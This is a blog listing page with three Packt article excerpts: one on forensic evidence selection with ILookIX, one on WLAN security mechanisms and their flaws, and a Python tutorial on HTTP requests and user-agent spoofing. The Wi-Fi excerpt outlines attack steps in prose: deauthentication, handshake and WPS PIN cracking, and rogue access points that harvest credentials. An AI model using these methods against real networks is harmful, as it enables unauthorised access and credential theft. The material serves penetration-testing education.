In this article, Richard Boddington, the author of Practical Digital Forensics, explains how the recovery and preservation of digital evidence has traditionally involved imaging devices and storing the data in bulk in a forensic file or, more effectively, in a forensic image container, notably the IlookIX .ASB container. The recovery of smaller, more manageable datasets from larger datasets from a device or network system using the ISeekDiscovery automaton is now a reality. Whether the practitioner examines an image container or an extraction of information in the ISeekDiscovery container, it should be possible to overview the recovered information and develop a clearer perception of the type of evidence that should be located. Once acquired, the image or device may be searched to find evidence, and locating evidence requires a degree of analysis combined with practitioner knowledge and experience. The process of selection involves analysis, and as new leads open up, the search for more evidence intensifies until ultimately, a thorough search is completed. The searching process involves the analysis of possible evidence, from which evidence may be discarded, collected, or tagged for later reexamination, thereby instigating the selection process. The final two stages of the investigative process are the validation of the evidence, aimed at determining its reliability, relevance, authenticity, accuracy, and completeness, and finally, the presentation of the evidence to interested parties, such as the investigators, the legal team, and ultimately, the legal adjudicating body. (For more resources related to this topic, see here.) Locating digital evidence Locating evidence from the all-too-common large dataset requires some filtration of extraneous material, which has, until recently, been a mainly manual task of sorting the wheat from the chaff. But it is important to clear the clutter and noise of busy operating systems and applications from which only a small amount of evidence really needs to be gleaned. Search processes involve searching in a file system and inside files, and common searches for files are based on names or patterns in their names, keywords in their content, and temporal data (metadata) such as the last access or written time. A pragmatic approach to the examination is necessary, where the onus is on the practitioner to create a list of key words or search terms to cull specific, probative, and case-related information from very large groups of files. Searching desktops and laptops Home computer networks are normally linked to the Internet via a modem and various peripheral devices: a scanner, printer, external hard drive, thumb drive storage device, a digital camera, a mobile phone and a range of users. In an office network this would be a more complicated network system. The linked connections between the devices and the Internet with the terminal leave a range of traces and logging records in the terminal and on some of the devices and the Internet. E-mail messages will be recorded externally on the e-mail server, the printer may keep a record of print jobs, the external storage devices and the communication media also leave logs and data linked to the terminal. All of this data may assist in the reconstruction of key events and provide evidence related to the investigation. Using the logical examination process (booting up the image) it is possible to recover a limited number of deleted files and reconstruct some of the key events of relevance to an investigation. It may not always be possible to boot up a forensic image and view it in its logical format, which is easier and more familiar to users. However, viewing the data inside a forensic image in it physical format provides unaltered metadata and a greater number of deleted, hidden and obscured files that provide accurate information about applications and files. It is possible to view the containers that hold these histories and search records that have been recovered and stored in a forensic file container. Selecting digital evidence For those unfamiliar with investigations, it is quite common to misread the readily available evidence and draw incorrect conclusions. Business managers attempting to analyze what they consider are the facts of a case would be wise to seek legal assistance in selecting and evaluating evidence on which they may wish to base a case. Selecting the evidence involves analysis of the located evidence to determine what events occurred in the system, their significance, and the probative value to the case. The selection analysis stage requires the practitioner to carefully examine the available digital evidence ensuring that they do not misinterpret the evidence and make imprudent presumptions without carefully cross-checking the information. It is a fact-finding process where an attempt is made to develop a plausible reconstruction of the facts. As in conventional crime investigations, practitioners should look for evidence that suggests or indicates motive (why?), means (how?) and opportunity (when?) for suspects to commit the crime, but in cases dependent on digital evidence, it can be a vexatious process. There are often too many potential suspects, which complicates the process of linking the suspect to the events. The following figure shows a typical family network setup using Wi-Fi connections to the home modem that facilitates connection to the Internet. In this case, the parents provided the broadband service for themselves and for three other family members. One of the children's girlfriend completed her university assignments on his computer and synchronized her iPad to his device. The complexity of a typical household network and determining the identity of the transgressor The complexity of a typical household network and determining the identity of the transgressor More effective forensic tools Various forensic tools are available to assist the practitioner in selecting and collating data for examination analysis and investigation. Sorting order from the chaos of even a small personal computer can be a time-consuming and frustrating process. As the digital forensic discipline develops, better and more reliable forensic tools have been developed to assist practitioners in locating, selecting, and collating evidence from larger, complex datasets. To varying degrees, most digital forensic tools used to view and analyze forensic images or attached devices provide helpful user interfaces for locating and categorizing information relevant to the examination. The most advanced application that provides access and convenient viewing of files is the Category Explorer feature in ILookIX, which divides files by type, signature, and properties. Category Explorer also allows the practitioner to create custom categories to group files by relevance. For example, in a criminal investigation involving a conspiracy, the practitioner could create a category for the first individual and a category for the second individual. As files are reviewed, they would then be added to either or both categories. Unlike tags, files can be added to multiple categories, and the categories can be given descriptive names. Deconstructing files The deconstruction of files involves processing compound files such as archives, e-mail stores, registry stores, or other files to extract useful and usable data from a complex file format and generate reports. Manual deconstruction adds significantly to the time taken to complete an examination. Deconstructable files are compound files that can be further broken down into smaller parts such as e-mails, archives, or thumb stores of JPG files. Once the deconstruction is completed, the files will either move into the deconstructed files or deconstruction failed files folders. Deconstructable files will now be now broken out more—e-mail, graphics, archives, and so on. Searching for files Indexing is the process of generating a table of text strings that can then be searched almost instantly any number of times. The two main uses of indexing are to create a dictionary to use when cracking passwords and to index the words for almost-instant searching. Indexing is also valuable when creating a dictionary or using any of the analysis functions built in to ILookIX. ILookIX facilitates the indexing of the entire media at the time of initial processing, all at once. This can also be done after processing. Indexing facilitates searching through files and archives, Windows Registry, e-mail lists, and unallocated space. This function is highly customizable via the setup option in order to optimize for searching or for creating a custom dictionary for password cracking. Sound indexing ensures speedy and accurate searching. Searching is the process of having ILookIX look through the evidence for a specific item, such as a string of text or an expression. An expression, in terms of searching, is a pattern used to structure data in a search, such as a credit card number or e-mail address. The Event Analysis tool ILookIX's Event Analysis tool provides the practitioner a graphical representation of events on the subject system, such as file creation, access, or modification; e-mails sent or received; and other events such as the modification of the Master File Table on an NTFS system. The application allows the practitioner to zoom in on any point on the graph to view more specific details. Clicking on any bar on the graph will return the view to the main ILookIX window and display the items from the date bar selected in the List Pane. This can be most helpful when analyzing events during specific periods. The Lead Analysis tool Lead Analysis is an interactive evidence model embedded in ILookIX that allows the practitioner to assimilate known facts into a graphic representation that directly links unseen objects. It provides the answers as the practitioner increases the detail of the design surface and brings into view specific relationships that could go unseen otherwise. The primary aim of Lead Analysis is to help discover links within the case data that may not be evident or intuitive and the practitioner may not be aware of directly or that the practitioner has little background knowledge of to help form relationships manually. Instead of finding and making note of various pieces of information, the analysis is presented as an easy-to-use link model. The complexity of the modeling is removed so that it gives the clearest possible method of discovery. The analysis is based on the current index database, so it is essential to index case data prior to initiating an analysis. Once a list of potential links has been generated, it is important to review them to see whether any are potentially relevant. Highlight any that are, and it will then be possible to look for words in the catalogues if they have been included. In the example scenario, the word divorce was located as it was known that Sarah was divorced from the owner of the computer (the initial suspect). By selecting any word by left-clicking on it once and clicking on the green arrow to link it to Sarah, as shown below, relationships can be uncovered that are not always clear during the first inspection of the data. Each of the stated facts becomes one starting lead on the canvas. If the nodes are related, it is easy to model that relationship by manually linking them together by selecting the first Lead Project to link, right-clicking, and selecting Add a New Port from the menu. This is then repeated for the second Lead Object the practitioner wants to link. By simply clicking on the new port of the selected object that needs to be linked from and dragging to the port of the Lead Object that it should be linked to, a line will appear linking the two together. It is then possible to iterate this process using each start node or discovered node until it is possible to make sense of the total case data. A simple relationship between suspects, locations and even concepts is illustrated in the following screenshot: ILookIX Lead Analysis discovering relationships between various entities ILookIX Lead Analysis discovering relationships between various entities Analyzing e-mail datasets Analyzing and selecting evidence from large e-mail datasets is a common task for the practitioner. ILookIX's embedded application E-mail Linkage Analysis is an interactive evidence model to help practitioners discover links between the correspondents within e-mail data. The analysis is presented as an easy-to-use link model; the complexity of the modeling is removed to provide the clearest possible method of discovery. The results of analysis are saved at the end of the modeling session for future editing. If there is a large amount of e-mail to process, this analysis generation may take a few minutes. Once the analysis is displayed, the user will see the e-mail linkage itself. It is then possible to see a line between correspondents indicating that they have a relationship of some type. Here in particular, line thickness indicates the frequency of traffic between two correspondents; therefore, thicker flow lines indicate more traffic. On the canvas, once the analysis is generated, the user may select any e-mail addressee node by left-clicking on it once. Creating the analysis is really simple, and one of the most immediately valuable resources this provides is group identification, as shown in the following screenshot. ILookIX will initiate a search for that addressee and list all e-mails where your selected addressee was a correspondent. Users may make their own connection lines by clicking on an addressee node point and dragging to another node point. Nodes can be deleted to allow linkage between smaller groups of individuals. The E-mail Linkage tool showing relationships of possible relevance to a case The E-mail Linkage tool showing relationships of possible relevance to a case The Volume Shadow Copy analysis tools Shadow volumes, also known as the Volume Snapshot Service (VSS), use a service that creates point-in-time copies of files. The service is built in to versions of Windows Vista, 7, 8, and 10 and is turned on by default. ILookIX can recover true copies of overwritten files from shadow volumes, as long as they resided on the volume at the time that the snapshot was created. VSS recovery is a method of recovering extant and deleted files from the volume snapshots available on the system. IlookIX, unlike any other forensic tool, is capable of reconstructing volume shadow copies, either differential or full, including deleted files and folders. In the test scenario, the tool recovered a total of 87,000 files, equating to conventional tool recovery rates. Using ILookIX's Xtreme File Recovery, some 337,000 files were recovered. The Maximal Full Volume Shadow Snapshot application recovered a total of 797,00 files. Using the differential process, 354,000 files were recovered, which filtered out 17,000 additional files for further analysis. This enabled the detection of e-mail messages and attachments and Windows Registry changes that would normally remain hidden. Summary This article described in detail the process of locating and selecting evidence in terms of a general process. It also further explained the nature of digital evidence and provided examples of its value in supporting a legal case. Various advanced analysis and recovery tools were demonstrated that show the reader how technology can speed up and make more efficient the location and selection processes. Some of these tools are not new but have been enhanced, while others are innovative and seek out evidence normally unavailable to the practitioner. Resources for Article: Further resources on this subject: Mobile Phone Forensics – A First Step into Android Forensics [article] Introduction to Mobile Forensics [article] BackTrack Forensics [article]
Read more
  • 0
  • 0
  • 3600

article-image-common-wlan-protection-mechanisms-and-their-flaws
Packt
07 Mar 2016
19 min read
Save for later

Common WLAN Protection Mechanisms and their Flaws

Packt
07 Mar 2016
19 min read
In this article by Vyacheslav Fadyushin, the author of the book Building a Pentesting Lab for Wireless Networks, we will discuss various WLAN protection mechanisms and the flaws present in them. To be able to protect a wireless network, it is crucial to clearly understand which protection mechanisms exist and which security flaws do they have. This topic will be useful not only for those readers who are new to Wi-Fi security, but also as a refresher for experienced security specialists. (For more resources related to this topic, see here.) Hiding SSID Let's start with one of the common mistakes done by network administrators: relying only on the security by obscurity. In the frames of the current subject, it means using a hidden WLAN SSID (short for service set identification) or simply WLAN name. Hidden SSID means that a WLAN does not send its SSID in broadcast beacons advertising itself and doesn't respond to broadcast probe requests, thus making itself unavailable in the list of networks on Wi-Fi-enabled devices. It also means that normal users do not see that WLAN in their available networks list. But the lack of WLAN advertising does not mean that a SSID is never transmitted in the air—it is actually transmitted in plaintext with a lot of packet between access points and devices connected to them regardless of a security type used. Therefore, SSIDs are always available for all the Wi-Fi network interfaces in a range and visible for any attacker using various passive sniffing tools. MAC filtering To be honest, MAC filtering cannot be even considered as a security or protection mechanism for a wireless network, but it is still called so in various sources. So let's clarify why we cannot call it a security feature. Basically, MAC filtering means allowing only those devices that have MAC addresses from a pre-defined list to connect to a WLAN, and not allowing connections from other devices. MAC addresses are transmitted unencrypted in Wi-Fi and are extremely easy for an attacker to intercept without even being noticed (refer to the following screenshot): An example of wireless traffic sniffing tool easily revealing MAC addresses Keeping in mind the extreme simplicity of changing a physical address (MAC address) of a network interface, it becomes obvious why MAC filtering should not be treated as a reliable security mechanism. MAC filtering can be used to support other security mechanisms, but it should not be used as an only security measure for a WLAN. WEP Wired equivalent privacy (WEP) was born almost 20 years ago at the same time as the Wi-Fi technology and was integrated as a security mechanism for the IEEE 802.11 standard. Like it often happens with new technologies, it soon became clear that WEP contains weaknesses by design and cannot provide reliable security for wireless networks. Several attack techniques were developed by security researchers that allowed them to crack a WEP key in a reasonable time and use it to connect to a WLAN or intercept network communications between WLAN and client devices. Let's briefly review how WEP encryption works and why is it so easy to break. WEP uses so-called initialization vectors (IV) concatenated with a WLAN's shared key to encrypt transmitted packets. After encrypting a network packet, an IV is added to a packet as it is and sent to a receiving side, for example, an access point. This process is depicted in the following flowchart: The WEP encryption process An attacker just needs to collect enough IVs, which is also a trivial task using additional reply attacks to force victims to generate more IVs. Even worse, there are attack techniques that allow an attacker to penetrate WEP-protected WLANs even without connected clients, which makes those WLANs vulnerable by default. Additionally, WEP does not have a cryptographic integrity control, which makes it vulnerable not only to attacks on confidentiality. There are numerous ways how an attacker can abuse a WEP-protected WLAN, for example: Decrypt network traffic using passive sniffing and statistical cryptanalysis Decrypt network traffic using active attacks (reply attack, for example) Traffic injection attacks Unauthorized WLAN access Although WEP was officially superseded by the WPA technology in 2003, it still can be sometimes found in private home networks and even in some corporate networks (mostly belonging to small companies nowadays). But this security technology has become very rare and will not be used anymore in future, largely due to awareness in corporate networks and because manufacturers no longer activate WEP by default on new devices. In our humble opinion, device manufacturers should not include WEP support in their new devices to avoid its usage and increase their customers' security. From the security specialist's point of view, WEP should never be used to protect a WLAN, but it can be used for Wi-Fi security training purposes. Regardless of a security type in use, shared keys always add the additional security risk; users often tend to share keys, thus increasing the risk of key compromise and reducing accountability for key privacy. Moreover, the more devices use the same key, the greater amount of traffic becomes suitable for an attacker during cryptanalytic attacks, increasing their performance and chances of success. This risk can be minimized by using personal identifiers (key, certificate) for users and devices. WPA/WPA2 Due to numerous WEP security flaws, the next generation of Wi-Fi security mechanism became available in 2003: Wi-Fi Protected Access (WPA). It was announced as an intermediate solution until WPA2 is available and contained significant security improvements over WEP. Those improvements include: Stronger encryption Cryptographic integrity control: WPA uses an algorithm called Michael instead of CRC used in WEP. This is supposed to prevent altering data packets on the fly and protects from resending sniffed packets. Usage of temporary keys: The Temporal Key Integrity Protocol (TKIP) automatically changes encryption keys generated for every packet. This is the major improvement over the static WEP where encryption keys should be entered manually in an AP config. TKIP also operates RC4, but the way how it is used was improved. Support of client authentication: The capability to use dedicated authentication servers for user and device authentication made WPA suitable for use in large enterprise networks. The support of cryptographically strong algorithm Advanced Encryption Standard (AES) was implemented in WPA, but it was not set as mandatory, only optional. Although WPA was a significant improvement over WEP, it was a temporary solution before WPA2 was released in 2004 and became mandatory for all new Wi-Fi devices. WPA2 works very similar to WPA and the main differences between WPA and WPA2 is in the algorithms used to provide security: AES became the mandatory algorithm for encryption in WPA2 instead of default RC4 in WPA TKIP used in WPA was replaced by Counter Cipher Mode with Block Chaining Message Authentication Code Protocol (CCMP) Because of the very similar workflows, WPA and WPA2 are also vulnerable to the similar or the same attacks and usually called and spelled in one word WPA/WPA2. Both WPA and WPA2 can work in two modes: pre-shared key (PSK) or personal mode and enterprise mode. Pre-shared key mode Pre-shared key or personal mode was intended for home and small office use where networks have low complexity. We are more than sure that all our readers have met this mode and that most of you use it at home to connect your laptops, mobile phones, tablets, and so on to home networks. The general idea of PSK mode is using the same secret key on an access point and on a client device to authenticate the device and establish an encrypted connection for networking. The process of WPA/WPA2 authentication using a PSK consists of four phases and is also called a 4-way handshake. It is depicted in the following diagram: WPA/WPA2 4-way handshake The main WPA/WPA2 flaw in PSK mode is the possibility to sniff a whole 4-way handshake and brute-force a security key offline without any interaction with a target WLAN. Generally, the security of a WLAN mostly depends on the complexity of a chosen PSK. Computing a PMK (short for primary master key) used in 4-way handshakes (refer to the handshake diagram) is a very time-consuming process compared to other computing operations and computing hundreds of thousands of them can take very long. But in case of a short and low complexity PSK in use, a brute-force attack does not take long even on a not-so-powerful computer. If a key is complex and long enough, cracking it can take much longer, but still there are ways to speed up this process: Using powerful computers with CUDA (short for Compute Unified Device Architecture), which allows a software to directly communicate with GPUs for computing. As GPUs are natively designed to perform mathematical operations and do it much faster than CPUs, the process of cracking works several times faster with CUDA. Using rainbow tables that contain pairs of various PSKs and their corresponding precomputed hashes. They save a lot of time for an attacker because the cracking software just searches for a value from an intercepted 4-way handshake in rainbow tables and returns a key corresponding to the given PMK if there was a match instead of computing PMKs for every possible character combination. Because WLAN SSIDs are used in 4-way handshakes analogous to a cryptographic salt, PMKs for the same key will differ for different SSIDs. This limits the application of rainbow tables to a number of the most popular SSIDs. Using cloud computing is another way to speed up the cracking process, but it usually costs additional money. The more computing power can an attacker rent (or get through another ways), the faster goes the process. There are also online cloud-cracking services available in Internet for various cracking purposes including cracking 4-way handshakes. Furthermore, as with WEP, the more users know a WPA/WPA2 PSK, the greater the risk of compromise—that's why it is also not an option for big complex corporate networks. WPA/WPA2 PSK mode provides the sufficient level of security for home and small office networks only when a key is long and complex enough and is used with a unique (or at least not popular) WLAN SSID. Enterprise mode As it was already mentioned in the previous section, using shared keys itself poses a security risk and in case of WPA/WPA2 highly relies on a key length and complexity. But there are several factors in enterprise networks that should be taken into account when talking about WLAN infrastructure: flexibility, manageability, and accountability. There are various components that implement those functions in big networks, but in the context of our topic, we are mostly interested in two of them: AAA (short for authentication, authorization, and accounting) servers and wireless controllers. WPA-Enterprise or 802.1x mode was designed for enterprise networks where a high security level is needed and the use of AAA server is required. In most cases, a RADIUS server is used as an AAA server and the following EAP (Extensible Authentication Protocol) types are supported (and several more, depending on a wireless device) with WPA/WPA2 to perform authentication: EAP-TLS EAP-TTLS/MSCHAPv2 PEAPv0/EAP-MSCHAPv2 PEAPv1/EAP-GTC PEAP-TLS EAP-FAST You can find a simplified WPA-Enterprise authentication workflow in the following diagram: WPA-Enterprise authentication Depending on an EAP-type configured, WPA-Enterprise can provide various authentication options. The most popular EAP-type (based on our own experience in numerous pentests) is PEAPv0/MSCHAPv2, which is relatively easily integrated with existing Microsoft Active Directory infrastructures and is relatively easy to manage. But this type of WPA-protection is relatively easy to defeat by stealing and bruteforcing user credentials with a rogue access point. The most secure EAP-type (at least, when configured and managed correctly) is EAP-TLS, which employs certificate-based authentication for both users and authentication servers. During this type of authentication, clients also check server's identity and a successful attack with a rogue access point becomes possible only if there are errors in configuration or insecurities in certificates maintenance and distribution. It is recommended to protect enterprise WLANs with WPA-Enterprise in EAP-TLS mode with mutual client and server certificate-based authentication. But this type of security requires additional work and resources. WPS Wi-Fi Protected Setup (WPS) is actually not a security mechanism, but a key exchange mechanism which plays an important role in establishing connections between devices and access points. It was developed to make the process of connecting a device to an access point easier, but it turned out to be one of the biggest wholes in modern WLANs if activated. WPS works with WPA/WPA2-PSK and allows connecting devices to WLANs with one of the following methods: PIN: Entering a PIN on a device. A PIN is usually printed on a sticker at the back side of a Wi-Fi access point. Push button: Special buttons should be pushed on both an access point and a client device during the connection phase. Buttons on devices can be physical and virtual. NFC: A client should bring a device close to an access point to utilize the Near Field Communication technology. USB drive: Necessary connection information exchange between an access point and a device is done using a USB drive. Because WPS PINs are very short and their first and second parts are validated separately, online brute-force attack on a PIN can be done in several hours allowing an attacker to connect to a WLAN. Furthermore, the possibility of offline PIN cracking was found in 2014 which allows attackers to crack pins in 1 to 30 seconds, but it works only on certain devices. You should also not forget that a person who is not permitted to connect to a WLAN but who can physically access a Wi-Fi router or access point can also read and use a PIN or connect via push button method. Getting familiar with the Wi-Fi attack workflow In our opinion (and we hope you agree with us), planning and building a secure WLAN is not possible without the understanding of various attack methods and their workflow. In this topic, we will give you an overview of how attackers work when they are hacking WLANs. General Wi-Fi attack methodology After refreshing our knowledge about wireless threats and Wi-Fi security mechanisms, let's have a look at the attack methodology used by attackers in the real world. Of course, as with all other types of network attack, wireless attack workflows depend on certain situations and targets, but they still align with the following general sequence in almost all cases: The first step is planning. Normally, attackers need to plan what are they going to attack, how can they do it, which tools are necessary for the task, when is the best time and place to attack certain targets, and which configuration templates will be useful so that they can be prepared in advance. White-hat hackers or penetration testers need to set schedules and coordinate project plans with their customers, choose contact persons on a customer side, define project deliverables, and do some other organizational work if demanded. As with every penetration testing project, the better a project was planned (and we can use the word "project" for black-hat hackers' tasks), the more chances of a successful result. The next step is survey. Getting as accurate as possible and as much as possible information about a target is crucial for a successful hack, especially in uncommon network infrastructures. To hack a WLAN or its wireless clients, an attacker would normally collect at least SSIDs or MAC addresses of access points and clients and information about a security type in use. It is also very helpful for an attacker to understand if WPS is enabled on a target access point. All that data allows attackers not only to set proper configs and choose the right options for their tools, but also to choose appropriate attack types and conditions for a certain WLAN or Wi-Fi client. All collected information, especially non-technical (for example, company and department names, brands, or employee names), can also become useful at the cracking phase to build dictionaries for brute-force attacks. Depending on a type of security and attacker's luck, a data collected at the survey phase can even make the active attack phase unnecessary and allow an attacker to proceed directly with the cracking phase. The active attacks phase involves active interaction between an attacker and targets (WLANs and Wi-Fi clients). At this phase, attackers have to create conditions necessary for a chosen attack type and execute it. It includes sending various Wi-Fi management and control frames and installing rogue access points. If an attacker wants to cause a denial of service in a target WLAN as a goal, such attacks are also executed at this phase. Some of active attacks are essential to successfully hack a WLAN, but some of them are intended to just speed up hacking and can be omitted to avoid causing alarm on various wireless intrusion detection/prevention systems (wIDPS), which can possibly be installed in a target network. Thus, the active attacks phase can be called optional. Cracking is another important phase where an attacker cracks 4-way-hadshakes, WEP data, NTLM hashes, and so on, which were intercepted at the previous phases. There are plenty of various free and commercial tools and services including cloud cracking services. In case of success at this phase, an attacker gets the target WLAN's secret(s) and can proceed with connecting to the WLAN, decrypt intercepted traffic, and so on. The active attacking phase Let's have a closer look to the most interesting parts of the active attack phase—WPA-PSK and WPA-Enterprise attacks—in the following topics. WPA-PSK attacks As both WPA and WPA2 are based on the 4-way handshake, attacking them doesn't differ—an attacker needs to sniff a 4-way handshake in the moment, establishing a connection between an access point and an arbitrary wireless client and bruteforcing a matching PSK. It does not matter whose handshake is intercepted, because all clients use the same PSK for a given target WLAN. Sometimes, attackers have to wait long until a device connects to a WLAN to intercept a 4-way handshake and of course they would like to speed up the process when possible. For that purpose, they force already connected device to disconnect from an access point sending control frames (deauthentication attack) on behalf of a target access point. When a device receives such a frame, it disconnects from a WLAN and tries to reconnect again if the "automatic reconnect" feature is enabled (it is enabled by default on most devices), thus performing another one 4-way handshake that can be intercepted by an attacker. Another possibility to hack a WPA-PSK protected network is to crack a WPS PIN if WPS is enabled on a target WLAN. Enterprise WLAN attacks Attacking becomes a little bit more complicated if WPA-Enterprise security is in place, but could be executed in several minutes by a properly prepared attacker by imitating a legitimate access point with a RADIUS server and by gathering user credentials for further analysis (cracking). To settle this attack, an attacker needs to install a rogue access point with a SSID identical to a target WLAN's SSID and set other parameter (like EAP type) similar to the target WLAN to increase chances on success and reduce the probability of the attack to be quickly detected. Most user Wi-Fi devices choose an access point for a connection to a certain WLAN by a signal strength—they connect to that one which has the strongest signal. That is why an attacker needs to use a powerful Wi-Fi interface for a rogue access point to override signals from legitimate ones and make devices around connect to the rogue access point. A RADIUS server used during such attacks should have a capability to record authentication data, NTLM hashes, for example. From a user perspective, being attacked in such way looks just being unable to connect to a WLAN for an unknown reason and could even be not seen if a user is not using a device at the moment and just passing by a rogue access point. It is worth mentioning that classic physical security or wireless IDPS solutions are not always effective in such cases. An attacker or a penetration tester can install a rogue access point outside of the range of a target WLAN. It will allow hacker to attack user devices without the need to get into a physically controlled area (for example, office building), thus making the rogue access point unreachable and invisible for wireless IDPS systems. Such a place could be a bus or train station, parking or a café where a lot of users of a target WLAN go with their Wi-Fi devices. Unlike WPA-PSK with only one key shared between all WLAN users, the Enterprise mode employs personified credentials for each user whose credentials could be more or less complex depending only on a certain user. That is why it is better to collect as many user credentials and hashes as possible thus increasing the chances of successful cracking. Summary In this article, we looked at the security mechanisms that are used to secure access to wireless networks, their typical threads, and common misconfigurations that lead to security breaches and allow attacker to harm corporate and private wireless networks. The brief attack methodology overview has given us a general understanding of how attackers normally act during wireless attacks and how they bypass common security mechanisms by abusing certain flaws in those mechanisms. We also saw that the most secure and preferable way to protect a wireless network is to use WPA2-Enterprise security along with a mutual client and server authentication, which we are going to implement in our penetration testing lab. Resources for Article: Further resources on this subject: Pentesting Using Python [article] Advanced Wireless Sniffing [article] Wireless and Mobile Hacks [article]
Read more
  • 0
  • 0
  • 5613
article-image-scraping-web-python-quick-start
Packt
17 Feb 2016
9 min read
Save for later

Scraping the Web with Python - Quick Start

Packt
17 Feb 2016
9 min read
In this article we're going to acquire intelligence data from a variety of sources. We might interview people. We might steal files from a secret underground base. We might search the World Wide Web (WWW). (For more resources related to this topic, see here.) Accessing data from the Internet The WWW and Internet are based on a series of agreements called Request for Comments (RFC). The RFCs define the standards and protocols to interconnect different networks, that is, the rules for internetworking. The WWW is defined by a subset of these RFCs that specifies the protocols, behaviors of hosts and agents (servers and clients), and file formats, among other details. In a way, the Internet is a controlled chaos. Most software developers agree to follow the RFCs. Some don't. If their idea is really good, it can catch on, even though it doesn't precisely follow the standards. We often see this in the way some browsers don't work with some websites. This can cause confusion and questions. We'll often have to perform both espionage and plain old debugging to figure out what's available on a given website. Python provides a variety of modules that implement the software defined in the Internet RFCs. We'll look at some of the common protocols to gather data through the Internet and the Python library modules that implement these protocols. Background briefing – the TCP/IP protocols The essential idea behind the WWW is the Internet. The essential idea behind the Internet is the TCP/IP protocol stack. The IP part of this is the internetworking protocol. This defines how messages can be routed between networks. Layered on top of IP is the TCP protocol to connect two applications to each other. TCP connections are often made via a software abstraction called a socket. In addition to TCP, there's also UDP; it's not used as much for the kind of WWW data we're interested in. In Python, we can use the low-level socket library to work with the TCP protocol, but we won't. A socket is a file-like object that supports open, close, input, and output operations. Our software will be much simpler if we work at a higher level of abstraction. The Python libraries that we'll use will leverage the socket concept under the hood. The Internet RFCs defines a number of protocols that build on TCP/IP sockets. These are more useful definitions of interactions between host computers (servers) and user agents (clients). We'll look at two of these: Hypertext Transfer Protocol (HTTP) and File Transfer Protocol (FTP). Using http.client for HTTP GET The essence of web traffic is HTTP. This is built on TCP/IP. HTTP defines two roles: host and user agent, also called server and client, respectively. We'll stick to server and client. HTTP defines a number of kinds of request types, including GET and POST. A web browser is one kind of client software we can use. This software makes GET and POST requests, and displays the results from the web server. We can do this kind of client-side processing in Python using two library modules. The http.client module allows us to make GET and POST requests as well as PUT and DELETE. We can read the response object. Sometimes, the response is an HTML page. Sometimes, it's a graphic image. There are other things too, but we're mostly interested in text and graphics. Here's a picture of a mysterious device we've been trying to find. We need to download this image to our computer so that we can see it and send it to our informant from http://upload.wikimedia.org/wikipedia/commons/7/72/IPhone_Internals.jpg: Here's a picture of the currency we're supposed to track down and pay with: We need to download this image. Here is the link: http://upload.wikimedia.org/wikipedia/en/c/c1/1drachmi_1973.jpg Here's how we can use http.client to get these two image files: import http.client import contextlib path_list = [ "/wikipedia/commons/7/72/IPhone_Internals.jpg", "/wikipedia/en/c/c1/1drachmi_1973.jpg", ] host = "upload.wikimedia.org" with contextlib.closing(http.client.HTTPConnection( host )) as connection: for path in path_list: connection.request( "GET", path ) response= connection.getresponse() print("Status:", response.status) print("Headers:", response.getheaders()) _, _, filename = path.rpartition("/") print("Writing:", filename) with open(filename, "wb") as image: image.write( response.read() ) We're using http.client to handle the client side of the HTTP protocol. We're also using the contextlib module to politely disentangle our application from network resources when we're done using them. We've assigned a list of paths to the path_list variable. This example introduces list objects without providing any background. It's important that lists are surrounded by [] and the items are separated by ,. Yes, there's an extra , at the end. This is legal in Python. We created an http.client.HTTPConnection object using the host computer name. This connection object is a little like a file; it entangles Python with operating system resources on our local computer plus a remote server. Unlike a file, an HTTPConnection object isn't a proper context manager. As we really like context managers to release our resources, we made use of the contextlib.closing() function to handle the context management details. The connection needs to be closed; the closing() function assures that this will happen by calling the connection's close() method. For all of the paths in our path_list, we make an HTTP GET request. This is what browsers do to get the image files mentioned in an HTML page. We print a few things from each response. The status, if everything worked, will be 200. If the status is not 200, then something went wrong and we'll need to read up on the HTTP status code to see what happened. If you use a coffee shop Wi-Fi connection, perhaps you're not logged in. You might need to open a browser to set up a connection. An HTTP response includes headers that provide some additional details about the request and response. We've printed the headers because they can be helpful in debugging any problems we might have. One of the most useful headers is ('Content-Type', 'image/jpeg'). This confirms that we really did get an image. We used _, _, filename = path.rpartition("/") to locate the right-most / character in the path. Recall that the partition() method locates the left-most instance. We're using the right-most one here. We assigned the directory information and separator to the variable _. Yes, _ is a legal variable name. It's easy to ignore, which makes it a handy shorthand for we don't care. We kept the filename in the filename variable. We create a nested context for the resulting image file. We can then read the body of the response—a collection of bytes—and write these bytes to the image file. In one quick motion, the file is ours. The HTTP GET request is what underlies much of the WWW. Programs such as curl and wget are expansions of this example. They execute batches of GET requests to locate one or more pages of content. They can do quite a bit more, but this is the essence of extracting data from the WWW. Changing our client information An HTTP GET request includes several headers in addition to the URL. In the previous example, we simply relied on the Python http.client library to supply a suitable set of default headers. There are several reasons why we might want to supply different or additional headers. First, we might want to tweak the User-Agent header to change the kind of browser that we're claiming to be. We might also need to provide cookies for some kinds of interactions. For information on the user agent string, see http://en.wikipedia.org/wiki/User_agent_string#User_agent_identification. This information may be used by the web server to determine if a mobile device or desktop device is being used. We can use something like this: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14 This makes our Python request appear to come from the Safari browser instead of a Python application. We can use something like this to appear to be a different browser on a desktop computer: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:28.0) Gecko/20100101 Firefox/28.0 We can use something like this to appear to be an iPhone instead of a Python application: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53 We make this change by adding headers to the request we're making. The change looks like this: connection.request( "GET", path, headers= { 'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53', }) This will make the web server treat our Python application like it's on an iPhone. This might lead to a more compact page of data than might be provided to a full desktop computer that makes the same request. The header information is a structure with the { key: value, } syntax. It's important that dictionaries are surrounded by {}, the keys and values are separated by :, and each key-value pair is separated by ,. Yes, there's an extra , at the end. This is legal in Python. There are many more HTTP headers we can provide. The User-Agent header is perhaps most important to gather different kinds of intelligence data from web servers. You can refer more book related to this topic on the following links: Python for Secret Agents - Volume II: (https://www.packtpub.com/application-development/python-secret-agents-volume-ii) Expert Python Programming: (https://www.packtpub.com/application-development/expert-python-programming) Raspberry Pi for Secret Agents: (https://www.packtpub.com/hardware-and-creative/raspberry-pi-secret-agents) Resources for Article: Further resources on this subject: Python Libraries[article] Optimization in Python[article] Introduction to Object-Oriented Programming using Python, JavaScript, and C#[article]
Read more
  • 0
  • 0
